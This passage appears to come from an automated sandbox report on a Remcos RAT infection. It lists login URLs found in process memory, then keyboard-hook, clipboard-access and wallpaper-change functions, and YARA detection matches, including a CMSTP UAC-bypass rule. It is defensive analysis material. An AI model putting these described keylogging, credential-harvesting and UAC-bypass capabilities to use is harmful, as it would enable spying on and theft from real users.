Source: svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB12C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srfssuer
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 0000001F.00000003.1764265481.0000013DBB12C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLo
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806014
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 0000001F.00000003.1765186757.0000013DBB157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogx
Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB12C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764605681.0000013DBB15A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 0000001F.00000002.3658824431.0000013DBB67D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf3
Source: svchost.exe, 0000001F.00000002.3658563765.0000013DBB617000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf4
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfs
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/st
Source: svchost.exe, 0000001F.00000002.3658163562.0000013DBA8C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657976153.0000013DBA881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 0000001F.00000003.3655631981.0000013DBA93B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comwwCP=
Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsofh
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf=
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfi
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657087544.0000013DBB14C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655928048.0000013DBB14A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 0000001F.00000003.1765488006.0000013DBB127000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
Source: svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf/
Source: svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
Source: vbc.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://signup.live.com/signup.aspx
Source: vbc.exe, vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: vbc.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000

26_2_0040A2B8

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

26_2_0040B70E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	26_2_004168C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	32_2_0040987A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	32_2_004098E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	37_2_00406DFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	37_2_00406E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	39_2_004068B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	39_2_004072B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	45_2_004168C1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

26_2_0040B70E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

26_2_0040A3E0

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.1750545324.000000000561A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4014378361.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.1916087250.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 4360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ngen.exe PID: 1112, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0041C9E2 SystemParametersInfoW,		26_2_0041C9E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0041C9E2 SystemParametersInfoW,		45_2_0041C9E2

System Summary

Malicious sample detected (through community Yara rule)

Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
